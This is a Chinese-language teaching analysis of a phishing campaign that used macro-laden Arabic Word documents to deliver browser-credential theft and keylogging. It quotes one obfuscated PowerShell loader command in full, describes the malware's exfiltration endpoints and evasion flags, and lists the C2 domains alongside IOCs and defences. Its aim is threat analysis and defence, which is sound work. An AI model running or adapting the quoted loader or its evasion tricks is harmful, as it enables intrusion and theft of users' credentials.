新型网络钓鱼活动事件分析
字数 1871 2025-08-18 11:36:53

新型网络钓鱼活动事件分析教学文档

事件概述

这是一起针对土耳其和卡塔尔用户的针对性网络钓鱼攻击活动,攻击者使用恶意Word文档作为初始攻击载体,通过宏代码执行PowerShell脚本,窃取浏览器敏感信息并建立持久化控制。

攻击流程分析

初始攻击载体

  • 使用阿拉伯语命名的恶意Word文档:
    • دعوة.doc (邀请.doc)
    • إستمارة.doc (表格.doc)
  • 文档内容伪装成"Al Quds议员协会"会议邀请,主题为"耶路撒冷是巴勒斯坦永恒的首都"
  • 诱使用户启用内容以执行恶意宏代码

技术执行流程

  1. Word文档启用宏后执行恶意代码
  2. 生成cmd.exe进程,执行混淆的PowerShell命令
  3. PowerShell从C2服务器下载并执行恶意脚本(cscript.ps1)

典型命令行示例:

"C:\Windows\System32\cmd.exe" /c " EcHo iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( 'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )^^^| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -"

恶意脚本功能

  1. 信息窃取:

    • 从Chrome、Firefox、Opera浏览器窃取:
      • Cookies
      • 会话信息
      • 登录凭证
    • 键盘记录功能(基于GitHub开源代码修改)

  2. 持久化机制:

    • 创建计划任务
    • 使用GlobalMutex确保单实例运行:
      • Global\rYF1pgeADA
      • Global\wfCQnIo2G7
    • 使用squiblydoo技术(通过scriptlet文件执行)

  3. C2通信:

    • 统一URL路径结构: /api/{endpoint}
    • 主要端点:
      • /api/cscript - 主脚本
      • /api/pscript - 持久化脚本
      • /api/logger/submit - 键盘记录数据提交
      • /api/{browser}/submit - 浏览器数据提交
      • /assest/sqlite - SQLite DLL下载

技术细节分析

混淆与逃避技术

  1. 命令行混淆:

    • 大小写随机混合(如pOwErSheLl)
    • 使用EcHo命令拼接执行代码
    • 参数分散传递

  2. 执行逃避:

    • -NoProfile - 不加载配置文件
    • -ExecutionPolicy Bypass - 绕过执行策略
    • -WindowStyle Hidden - 隐藏窗口
    • -NonInteractive - 非交互模式

  3. 代码传递:

    • 使用DEFLATE压缩和Base64编码
    • 内存中解压执行,减少磁盘痕迹

基础设施分析

  • C2服务器:
    • microsoftdata.linkpc.net
    • 4host.publicvm.com
  • DNS服务:
    • 使用DNSExit提供的动态DNS服务
  • URL模式:
    • 固定使用/api/前缀路径

检测与防御建议

检测指标(IOCs)

  1. 文件哈希:

    • 1d2bbe3fd9021bbed4667628b86156bee8763b3d93cdac6de398c751a281a324 (دعوة.doc)
    • bf4d4ee4a8e4472c7968586fa0318e556a89bfd94aeb4e72afd99ab340541770 (إستمارة.doc)
    • 7a26d5b600a078816beb3a2849827fa7d45ec85ec6c3343b3857f10edfece74c (cscript.ps1)

  2. 网络指标:

    • hxxp://microsoftdata[.]linkpc[.]net
    • hxxp://4host[.]publicvm[.]com

  3. 行为指标:

    • Winword.exe生成可疑cmd.exe进程
    • cmd.exe调用PowerShell下载执行远程代码
    • 创建特定命名的全局互斥量
    • 异常的计划任务创建

防御措施

  1. 技术控制:

    • 禁用Office宏执行或限制为仅签名宏
    • 监控和限制PowerShell的异常使用
    • 实施应用白名单策略
    • 监控可疑的父子进程关系(如winword->cmd->powershell)

  2. 安全意识:

    • 培训用户识别可疑邮件和文档
    • 警告用户不要轻易启用文档内容
    • 对涉及敏感主题的文档保持警惕

  3. 取证分析:

    • 检查计划任务中可疑条目
    • 搜索系统中特定命名的互斥量
    • 分析PowerShell日志和命令行历史

关联分析

  • 与2018年8月针对卡塔尔的攻击活动相似:
    • 相同攻击模式
    • 代码结构相似
    • 使用相同动态DNS服务
  • 可能出于政治动机而非经济利益驱动

总结

该攻击活动展示了高级持续性威胁(APT)的典型特征:

  1. 针对性钓鱼诱饵
  2. 使用合法工具链(LOLBins)
  3. 多阶段载荷投放
  4. 持久化机制
  5. 信息收集与渗出
  6. 基础设施冗余

防御此类攻击需要多层防护策略,结合技术控制、行为监控和用户教育。

新型网络钓鱼活动事件分析教学文档 事件概述 这是一起针对土耳其和卡塔尔用户的针对性网络钓鱼攻击活动,攻击者使用恶意Word文档作为初始攻击载体,通过宏代码执行PowerShell脚本,窃取浏览器敏感信息并建立持久化控制。 攻击流程分析 初始攻击载体 使用阿拉伯语命名的恶意Word文档: دعوة.doc (邀请.doc) إستمارة.doc (表格.doc) 文档内容伪装成"Al Quds议员协会"会议邀请,主题为"耶路撒冷是巴勒斯坦永恒的首都" 诱使用户启用内容以执行恶意宏代码 技术执行流程 Word文档启用宏后执行恶意代码 生成cmd.exe进程,执行混淆的PowerShell命令 PowerShell从C2服务器下载并执行恶意脚本( cscript.ps1 ) 典型命令行示例 : 恶意脚本功能 信息窃取 : 从Chrome、Firefox、Opera浏览器窃取: Cookies 会话信息 登录凭证 键盘记录功能(基于GitHub开源代码修改) 持久化机制 : 创建计划任务 使用GlobalMutex确保单实例运行: Global\rYF1pgeADA Global\wfCQnIo2G7 使用squiblydoo技术(通过scriptlet文件执行) C2通信 : 统一URL路径结构: /api/{endpoint} 主要端点: /api/cscript - 主脚本 /api/pscript - 持久化脚本 /api/logger/submit - 键盘记录数据提交 /api/{browser}/submit - 浏览器数据提交 /assest/sqlite - SQLite DLL下载 技术细节分析 混淆与逃避技术 命令行混淆 : 大小写随机混合(如 pOwErSheLl ) 使用 EcHo 命令拼接执行代码 参数分散传递 执行逃避 : -NoProfile - 不加载配置文件 -ExecutionPolicy Bypass - 绕过执行策略 -WindowStyle Hidden - 隐藏窗口 -NonInteractive - 非交互模式 代码传递 : 使用DEFLATE压缩和Base64编码 内存中解压执行,减少磁盘痕迹 基础设施分析 C2服务器 : microsoftdata.linkpc.net 4host.publicvm.com DNS服务 : 使用DNSExit提供的动态DNS服务 URL模式 : 固定使用 /api/ 前缀路径 检测与防御建议 检测指标(IOCs) 文件哈希 : 1d2bbe3fd9021bbed4667628b86156bee8763b3d93cdac6de398c751a281a324 (دعوة.doc) bf4d4ee4a8e4472c7968586fa0318e556a89bfd94aeb4e72afd99ab340541770 (إستمارة.doc) 7a26d5b600a078816beb3a2849827fa7d45ec85ec6c3343b3857f10edfece74c (cscript.ps1) 网络指标 : hxxp://microsoftdata[.]linkpc[.]net hxxp://4host[.]publicvm[.]com 行为指标 : Winword.exe生成可疑cmd.exe进程 cmd.exe调用PowerShell下载执行远程代码 创建特定命名的全局互斥量 异常的计划任务创建 防御措施 技术控制 : 禁用Office宏执行或限制为仅签名宏 监控和限制PowerShell的异常使用 实施应用白名单策略 监控可疑的父子进程关系(如winword->cmd->powershell) 安全意识 : 培训用户识别可疑邮件和文档 警告用户不要轻易启用文档内容 对涉及敏感主题的文档保持警惕 取证分析 : 检查计划任务中可疑条目 搜索系统中特定命名的互斥量 分析PowerShell日志和命令行历史 关联分析 与2018年8月针对卡塔尔的攻击活动相似: 相同攻击模式 代码结构相似 使用相同动态DNS服务 可能出于政治动机而非经济利益驱动 总结 该攻击活动展示了高级持续性威胁(APT)的典型特征: 针对性钓鱼诱饵 使用合法工具链(LOLBins) 多阶段载荷投放 持久化机制 信息收集与渗出 基础设施冗余 防御此类攻击需要多层防护策略,结合技术控制、行为监控和用户教育。